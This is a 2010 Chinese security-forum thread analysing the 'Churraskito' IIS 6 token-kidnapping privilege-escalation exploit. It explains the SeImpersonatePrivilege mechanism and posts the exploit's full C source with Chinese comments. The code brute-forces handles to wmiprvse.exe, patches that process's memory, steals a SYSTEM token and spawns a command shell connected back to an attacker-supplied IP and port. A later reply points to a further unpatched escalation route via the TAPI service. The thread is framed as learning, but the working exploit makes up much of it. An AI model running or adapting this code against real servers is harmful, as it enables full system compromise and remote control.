首页
论坛
专栏
课程

[原创]提权大杀器源代码分析报告[最新修改]

2010-9-3 23:20 18238

[原创]提权大杀器源代码分析报告[最新修改]

2010-9-3 23:20
18238
BaCde:很希望能够得到大家的指点!或者评论!这里最新修改了。大家可以看一下!呵呵
目标:分析并编写WEB版提权大杀器(分析的是IIS6的exp)

分析人:BaCde

时间:2010年08月17日22点10分

分析情况:

       大家好,我是BaCde,这次主要分析的是提权大杀器的代码,由于条件有限,在我的机子上无法测试,所以这里我只是把我的思路介绍一下!其中有可能(很大可能)存在着一些(甚至是大多数)逻辑问题以及一些常规错误,还希望大家来积极的指正。(我研究这个花了3、4天的时间,效率真是太低了!5555…..我得努力啊!)

       看了一下关于漏洞的介绍,了解其主要存在的原因如下:
      

这个漏洞是由于在NetworkService 或者 LocalService 下运行的代码,可以访问同样是在 NetworkService 或者 LocalService 下运行的进程,某些进程允许提升权限为LocalSystem。

对于Windows Server 2003,攻击者可以通过MSDTC获取token访问其他同样token的进程,从而可能造成提权。任何具有SeImpersonatePrivilege的进程都有可能造成提权。

         

我们这里主要弄明白的是怎样提升权限的。

         后来我经过分析,提权的主要地方是SeImpersonatePrivilege 这个也就是windowsNT中的一种特权,他是模拟后验证客户端,这个才是提权最主要的地方。关于绕过权限认证这方面,Windows NT的核心主要就是权限---令牌---ACL ,这里是比较容易出问题的,也就是acl,token,and privilege。其中这里主要是权限(privilege)的出的问题,权限是系统赋予用户的一定的权力,它们允许或者不允许某些影响整个计算机系统而非某一对象的特权操作,以下是一些系统的权限:
1. SeTcbPrivilege
2. SeMachineAccountPrivilege
3. SeBackupPrivilege
4. SeChangeNotifyPrivilege
5. SeSystemTimePrivilege
6. SeCreatePagefilePrivilege
7. SeCreateTokenPrivilege
8. SeCreatePermanentPrivilege
9. SeDebugPrivilege
10. SeEnableDelegationPrivilege
11. SeRemoteShutdownPrivilege
12. SeAuditPrivilege
13. SeIncreaseQuotaPrivilege
14. SeIncreaseBasePriorityPrivilege
15. SeLoadDriverPrivilege
16. SeLockMemoryPrivilege
17. SeSecurityPrivilege
18. SeSystemEnvironmentPrivilege
19. SeProfileSingleProcessPrivilege
20. SeSystemProfilePrivilege
21. SeUndockPrivilege
22. SeAssignPrimaryTokenPrivilege
23. SeRestorePrivilege
24. SeShutdownPrivilege
25. SeSynchAgentPrivilege
26. SeTakeOwnershipPrivilege
27. SeImpersonatePrivilege
以上的中文意思大家可以自己查以下,我这里就不列出了,windows中administrator主要是具有20项特权,其实利用特权可以做很多东西,例如我们关机的时候就使用了SeDebugPrivilege,也就是调试特权!关于他的一些东西大家可以参看《关于Windows的权限和一些安全问题》
。其中我们今天需要关注的就是SeImpersonatePrivilege
关于SeImpersonatePrivilege的描述:
Requiring this privilege prevents an unauthorized user from convincing a client to connect to a service they have created and impersonating that client, which can elevate the unauthorized user's permissions to administrative or system levels. Note that assigning this privilege can be a security risk, so only assign it to trusted users.
允许程序对用户的名义运行来模拟客户端。这需要一个令人信服的特权阻止客户端连接到他们所创建和冒充服务未经授权的用户,客户端,它可以提升未经授权的用户的权限给予行政或系统水平。请注意,此权限可以分配一个安全风险,因此,只有将其分配给用户信赖。
也就是说如果想要提权,必须所模拟的那个进行必须具有SeImpersonatePrivilege权限。这样我们才可以复制一个句柄,然后在利用这个句柄来创建一个新的进程。

以下是以前的分析:
首先说一下程序的思路(是我的分析,不一定正确。),获取wmiprvse.exe进程的句柄,然后在以wmiprvse.exe进程的句柄创建一个相同的,然后获取新句柄用户中是system用户权限的,接这就是利用这个新创建的句柄使用CreateProcessAsUser函数创建一个执行我们的代码(进程,源代码给出的是提供一个反向的shell.)。那么为什么这样就可以提权呢?我在一次查毒的过程中打开了Process Explorer查看进程时,下面的信息吸引了我(图1),我们可以看到Token等信息,那么我们可以看到一个进程有多个token,那么我们都知道,在windows中可以有多个用户,而每个用户都可以有多个组,例如我们经常添加3389管理管账户通常就属于两个组的分别是Users组和administrators组,由于我们admin组的权限大于Users组的权限,所以我们可以执行Users组用户权限的操作,也可以执行admin组权限的操作(这里是默认,排除用户自己设置NTFS权限的原因),也就是说同时属于Users组和Admin组的用户,那么用户的权限受属于权限较大的影响!反过来,一个进程有多个Token那么,有属于NetworkService也有属于LocalSystem 的,那么,我们以NetworkService权限运行的进程就可以访问这个进程,然后通过复制进程的句柄,然后我们去查找这个句柄中是LocalSystem 的权限的用户名复制一个句柄,然后以这个句柄来使用CreateProcessAsUser函数来建立一个进程。这样我们的新创建的进程就是LocalSystem 的权限了!

这份代码中使用for循环的方式来猜解进程的句柄,原因可能是因为权限的问题吧!

当然,在这其中进行了一些操作!例如注册表操作、wmi操作、修改内存操作。其中我不明白的就是操作内存的那个是什么作用。这是我第一次写东西。没什么经验,也不知道该怎么写,自己也没文采,所以就按照自己的方式写了,写的很烂,希望大家不要丢鸡蛋啊。^_^.哪里不足的,希望大家能够慷慨的指出,我好及时改正!呵呵!当然这里我在原来的代码上加入了注释!



图1

涉及到的一些资料出处:

一些关于结构的信息,还有一些函数是在百度百科和百度文库找到的!主要有:

       STARTUPINFO结构信息

    WMI信息

DuplicateHandle函数

GetEnvironmentVariable函数

CoCreateInstance函数

查看进程令牌信息源代码             来自黑客基地

模拟连接的客户端

windows sdk编程系列文章 ---- 浅析windows安全策略

MS Windows Token Kidnapping本地提权的解决方案        马俊的blog

InsomniaShell ASPX版的 shell后门创建工具                           暗组

Searching for a SID in an Access Token in C++

进程令牌(TOKEN)相关!            huangyong19870618的专栏 - CSDN博客

注:以上我没有记连接,不过根据标题使用google可以很容易就可以找到!

[公告]安全服务和外包项目请将项目需求发到看雪企服平台:https://qifu.kanxue.com

上传的附件:
最新回复 (24)
whack 2010-9-4 03:28
2
0
写了一些注释!呵呵!欢迎大家指正!
加了注释代码如下(主要是对main入口函数进行了详细的注释):

// Churraskito -> IIS 6 exploit

// by Cesar Cerrudo

// Argeniss - Information Security & Software

// Note: The IIS application pool identity should be Network Service (default) for this exploit to work

// if it's Local Service then some minor changes must be performed on the code

//该利用工具并非执行命令,而是提供一个反弹的shell

#include "stdafx.h"

//这里应该是获取用户令牌的类型

BOOL IsImpersonationToken (HANDLE hToken, CHAR * cType)

{

       DWORD ReturnLength;

       SECURITY_IMPERSONATION_LEVEL TokenImpInfo;

       TOKEN_TYPE TokenTypeInfo;

       if(GetTokenInformation(hToken, TokenType, &TokenTypeInfo, sizeof(TokenTypeInfo), &ReturnLength)){

              if (TokenTypeInfo==TokenImpersonation) {

                     if((GetTokenInformation(hToken, TokenImpersonationLevel, &TokenImpInfo, sizeof(TokenImpInfo), &ReturnLength)&& TokenImpInfo==SecurityImpersonation)){

                            if (cType) *cType='I';

                            return TRUE;

                     }

        }

              else {

                     if (cType) *cType='P'; //it's a primary token, TokenTypeInfo==TokenPrimary

                     return TRUE;

              }

       }

       return FALSE;

}

BOOL GetTokenUser(HANDLE hToken, LPTSTR UserName)

{

       DWORD dwBufferSize = 0;

       SID_NAME_USE SidNameUse;

       TCHAR DomainName[MAX_PATH];

       DWORD dwUserNameSize= MAX_PATH * 2 ;

       DWORD dwDomainNameSize = MAX_PATH * 2;

       PTOKEN_USER pTokenUser;

       GetTokenInformation(hToken, TokenUser, NULL,0,&dwBufferSize);

       pTokenUser = (PTOKEN_USER) new BYTE[dwBufferSize];

       memset(pTokenUser, 0, dwBufferSize);

       if (GetTokenInformation(hToken, TokenUser, pTokenUser, dwBufferSize, &dwBufferSize)){

              if (LookupAccountSid(NULL,pTokenUser->User.Sid,UserName,&dwUserNameSize,DomainName,&dwDomainNameSize,&SidNameUse)){

                     return TRUE;

              }

       }

      

       return FALSE;

}

//调用wmi

void InvokeWMI(){

       HRESULT hRes;

    _bstr_t bstrServer;

       IWbemLocatorPtr spLocator;

    IWbemServicesPtr spServices;

    IEnumWbemClassObjectPtr spEnum;

    IWbemClassObjectPtr spObject;

       CoInitialize(NULL);

    // create WBEM locator object

       //创建WBEM

    hRes = CoCreateInstance(__uuidof(WbemLocator), NULL,

                        CLSCTX_INPROC_SERVER, __uuidof(IWbemLocator),

                        (PVOID *)&spLocator);

    if (FAILED(hRes))

        _com_issue_error(hRes);

      

    hRes = spLocator->ConnectServer(_bstr_t(L"root\\MicrosoftIISv2"), NULL, NULL, NULL, 0, NULL, NULL, &spServices);

    if (FAILED(hRes))

        _com_issue_error(hRes);

    // create enumerator

        IEnumWbemClassObject* pEnumerator = NULL;

     hRes = spServices->ExecQuery(

        bstr_t("WQL"),

        bstr_t("SELECT * FROM IIsWebInfo"),

        WBEM_FLAG_FORWARD_ONLY | WBEM_FLAG_RETURN_IMMEDIATELY,

        NULL,

        &pEnumerator);

}

HANDLE GetWMIProcHandle(){

       TCHAR szProcessName[MAX_PATH] = TEXT("<unknown>");

       HANDLE hProcess;

       HMODULE hMod;

       DWORD cbNeeded;

   

       //使用循环来猜wmiprvse.exe的句柄

       for (DWORD i=0;i<0xffff;i+=4){

              hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, i );

              if (hProcess)

              {

                     if ( EnumProcessModules( hProcess, &hMod, sizeof(hMod),    &cbNeeded) )

                     {

                            GetModuleBaseName( hProcess, hMod, szProcessName,

                                                        sizeof(szProcessName)/sizeof(TCHAR) );

                            if (!strcmp(szProcessName,"wmiprvse.exe")){

                                   printf ("/Churraskito/-->Got WMI process Pid: %d <BR>",i);

                                   return hProcess;

                            }

                     }

                     CloseHandle(hProcess);

              }

       }

       return 0;

}

void PatchProc(HANDLE hProc){

       DWORD dwOldProt;

       char Buff[]="\xc2\x04\x00";

       char Buff2[]="\x6a\x0c\x90";

       LPVOID lpAddress;

       VirtualProtectEx(hProc,CloseHandle,0x3,PAGE_EXECUTE_READWRITE,&dwOldProt);

       WriteProcessMemory(hProc,CloseHandle,Buff,0x3,NULL);

       VirtualProtectEx(hProc,CloseHandle,0x3,dwOldProt,&dwOldProt);

      

       lpAddress=(LPVOID)((DWORD)OpenThreadToken+0xb);

       VirtualProtectEx(hProc,lpAddress,0x3,PAGE_EXECUTE_READWRITE,&dwOldProt);

       WriteProcessMemory(hProc,lpAddress,Buff2,0x3,NULL);

       VirtualProtectEx(hProc,lpAddress,0x3,dwOldProt,&dwOldProt);

}

void RestoreProc(HANDLE hProc){

       DWORD dwOldProt;

       char Buff[]="\xc2\x04\x00";

       VirtualProtectEx(hProc,CloseHandle,0x3,PAGE_EXECUTE_READWRITE,&dwOldProt);

       WriteProcessMemory(hProc,CloseHandle,Buff,0x3,NULL);

       VirtualProtectEx(hProc,CloseHandle,0x3,dwOldProt,&dwOldProt);

}

DWORD WINAPI ThreadProc(LPVOID lpParameter){

       while (1==1){

              InvokeWMI();

              Sleep(20000);

       }

}

//反弹Shell函数

DWORD SpawnReverseShell(HANDLE hToken, DWORD dwPort,LPSTR sIP)

{

    HANDLE hToken2,hTokenTmp;

       PROCESS_INFORMATION pInfo;

       STARTUPINFO         sInfo;

       WSADATA wd;

       SOCKET sock;

       struct sockaddr_in sin;

       int size = sizeof(sin);

       memset(&sin, 0, sizeof(sin));

       WSAStartup(MAKEWORD( 1, 1 ), &wd);

       sock=WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);

       sin.sin_family = AF_INET;

       bind(sock, (struct sockaddr*)&sin, size);

       sin.sin_port = htons(dwPort);

       sin.sin_addr.s_addr = inet_addr(sIP);

      

       DWORD dwRes=connect(sock, (struct sockaddr*)&sin, size);

       if (dwRes!=0){

              printf ("/Churraskito/-->Could not connect to %s<BR>",sIP);

              return 0;

       }

       //以上代码为反向连接的shell,需要事先在本地用NC监听端口

      

    ZeroMemory(&sInfo, sizeof(STARTUPINFO));

    ZeroMemory(&pInfo, sizeof(PROCESS_INFORMATION));

    sInfo.cb= sizeof(STARTUPINFO);

    sInfo.lpDesktop= "WinSta0\\Default"; //so we don't have to wait on the process

    sInfo.dwFlags = STARTF_USESTDHANDLES;

    sInfo.hStdInput = sInfo.hStdOutput = sInfo.hStdError =(HANDLE) sock;

       CHAR cType;

       IsImpersonationToken(hToken, &cType);

       if (cType=='I'){

              SetThreadToken(NULL, hToken);

              OpenThreadToken(GetCurrentThread(),TOKEN_ALL_ACCESS,FALSE,&hTokenTmp);

              SetThreadToken(NULL, NULL);

       }

       else

              hTokenTmp=hToken;

      

       DuplicateTokenEx(hTokenTmp,MAXIMUM_ALLOWED,NULL,SecurityImpersonation, TokenPrimary,&hToken2) ;

       LPTSTR lpComspec;

       lpComspec= (LPTSTR) malloc(1024*sizeof(TCHAR));

       GetEnvironmentVariable("comspec",lpComspec,1024);//it won't work if cmd.exe used as commandline param

       dwRes=CreateProcessAsUser(hToken2, lpComspec ,NULL, NULL, NULL, TRUE, NULL, NULL, NULL, &sInfo, &pInfo);

      

       if (hTokenTmp!=hToken)

              CloseHandle(hTokenTmp);

       CloseHandle(hToken2);

       return dwRes;

}

bool SetRegistryValues()

{

   HKEY hKey;

   DWORD x=0x0;

   bool result=false;

   //创建注册表{1F87137D-0E7C-44d5-8C73-4EFFB68962F2}

   if( RegCreateKeyEx(HKEY_USERS,TEXT("S-1-5-20_Classes\\AppID\\{1F87137D-0E7C-44d5-8C73-4EFFB68962F2}"),NULL,NULL,NULL,KEY_ALL_ACCESS,NULL, &hKey,NULL) == ERROR_SUCCESS )

   {

              if (RegSetValueEx(hKey,"AppIDFlags",NULL,REG_DWORD,(PBYTE)&x,sizeof(DWORD))== ERROR_SUCCESS )

              {

                     result=true;

              }

   RegCloseKey(hKey);

   }

   return result;

}

bool DelRegistrySubkeys()

{

   bool result=false;

   //删除注册表操作

   if( RegDeleteKey(HKEY_USERS,TEXT("S-1-5-20_Classes\\AppID\\{1F87137D-0E7C-44d5-8C73-4EFFB68962F2}")) == ERROR_SUCCESS )

   {

              if( RegDeleteKey(HKEY_USERS,TEXT("S-1-5-20_Classes\\AppID")) == ERROR_SUCCESS )

           {

                     result=true;

              }

   }

   return result;

}

int _tmain(int argc, _TCHAR* argv[])

{

       HANDLE hToken,hTokenOut;

       TCHAR UserName[32767];

       DWORD lpThreadId;

       DWORD dwPort;

       LPSTR sIP;

       HANDLE hProc;

       printf ("/Churraskito/-->This exploit gives you a Local System shell <BR>");

      

       //帮助提示Usage()

       if (argc != 3) {

              printf ("/Churraskito/-->Usage: Churraskito.exe ipaddress port <BR>");

              return 0;

       }

      

       sIP= argv[1];

       dwPort= atoi(argv[2]);

       //写注册表操作

       //创建HKU下的AppId\{1F87137D-0E7C-44d5-8C73-4EFFB68962F2}\AppIdFlags为0x0000000

       if (!SetRegistryValues()) {

              printf ("/Churraskito/-->Could not set registry values<BR>");

              return 0;

       }

      

       //创建一个线程线程执行InvokeWMI()

       //由于下面要获取wmiprvse.exe进程句柄,所以需要先进行wmi操作

       CreateThread(NULL,NULL,ThreadProc,NULL,NULL,&lpThreadId);

       Sleep(500);                //等待500毫秒

      

       //获取句柄

       hProc=GetWMIProcHandle();

      

       //如果获取句柄成功

       if (hProc){

              PatchProc(hProc);

              while (1==1){

                     for (DWORD j=0x4;j<=0x400;j+=4){

                            //hToken为 指定对象的现有句柄

                            hToken=(HANDLE)j;

                            //以wmiprvse的句柄来创建一个新句柄

                            //该句柄有可能在其他进程

                            if (DuplicateHandle(hProc,hToken,GetCurrentProcess(),&hTokenOut,0,FALSE,DUPLICATE_SAME_ACCESS )){

                                   //

                                   if (IsImpersonationToken(hTokenOut, NULL) ){

                                          //获取新句柄的用户名

                                          if(GetTokenUser(hTokenOut, UserName)){

                                                 printf ("/Churraskito/-->Found token %s <BR>",UserName);

                                                 if (!strcmp(UserName,"SYSTEM")){

                                                        DelRegistrySubkeys();      //删除注册表

                                                        printf ("/Churraskito/-->Running reverse shell<BR>");

                                                        //反向连接

                                                        SpawnReverseShell(hTokenOut,dwPort,sIP);

                                                        return 0;

                                                 }

                                          }

                                   }

                                   CloseHandle(hTokenOut);

                            }

                     }

                     Sleep(500);

              }

              CloseHandle(hProc);

       }

       return 0;

}
ucantseeme 2010-9-4 08:21
3
0
保存学习一下

好多API都看不懂
dayang 2010-9-4 17:14
4
0
应该使用VS什么版本编译呢?
垃圾一个 2010-9-4 18:37
5
0
这个,这个是啥意思?
垃圾一个 2010-9-4 18:44
6
0
小毛孩?
tsenable 2010-9-4 21:58
7
0
先标记,慢欣赏
黑暗之子 2010-9-5 12:28
8
0
补上了,死心了吧
fishhluck 2010-9-6 11:27
9
0
两个建议:一个是看看关于Impersonation这个特性相关的东东,这是提权的关键;另一个就是看看这个提权大杀器源出处2010黑帽大会文档“Kidnapping's Revenge”,弄清楚题目为何是“Revenge”。

这两个弄清楚了,对这个提权的理解就能更深一步了。
whack 2010-9-6 17:19
10
0
谢谢提示!太感谢了!我会继续研究的!呵呵!我不知道有文档,只知道当初有源代码!太感谢了!
whack 2010-9-6 17:20
11
0
厉害,知道我岁数不大!哈哈!所以我才要向别人请教,学习!您是不是不看好90后?呵呵!
whack 2010-9-6 17:21
12
0
呵呵!望收到您的指点!
whack 2010-9-6 18:04
13
0
应该是vs2003的!我记得是!完整的代码可以到网上去下载。我把原来的代码发出来吧!呵呵!
whack 2010-9-6 18:04
14
0
你是指什么?呵呵!
whack 2010-9-6 18:05
15
0
我也是,查了很多API的资料,慢慢研究的!有可能不对,所以希望大家指点!
垃圾一个 2010-9-7 17:30
16
0
不是,我一点也没有。90后NB的多着呢,我是在想,很多人来论坛,为啥不把所有的帖子看几个来回呢。
whack 2010-9-7 20:23
17
0
呵呵!我到是没发现90后哪个牛B的!如果把看雪看个遍,那绝对是高手了!呵呵!我最近根据别人的指点,继续研究!不过基础差,需要一些时间!到时候准备重新写一下这个!呵呵!
垃圾一个 2010-9-7 21:15
18
0
这个,这个,只能说你知道的太少,看来你很少看百度博客。
foxabu 13 2010-9-9 01:39
19
0
提权玩过一两次就觉得没意思了。
whack 2010-9-9 16:43
20
0
对啊!最近又找了一些,又有了一些进一步的了解!我准备到时候重写!我主要就是想跟大家交流一下,这样才会进步!呵呵!不然我自己一个人研究一定会偏的,多亏了各位的指点啊!呵呵!
whack 2010-9-14 17:46
21
0
怎么评论的这么少,难道大家都不关心吗?
◕‿◕ 2010-9-16 23:25
22
0
命名管道这个方法微软已经出补丁了,但用lineAddProvider投个DLL给tapisrv服务还没封,LZ可以自己动手写一写。不要老是直接拿老外的代码
whack 2010-9-17 22:26
23
0
知道了!呵呵!谢谢!
pentacleNC 4 2011-2-15 15:11
24
0
马克一下!
wxhanshan 2011-2-15 15:44
25
0
向别人请教,学习
游客
登录 | 注册 方可回帖
返回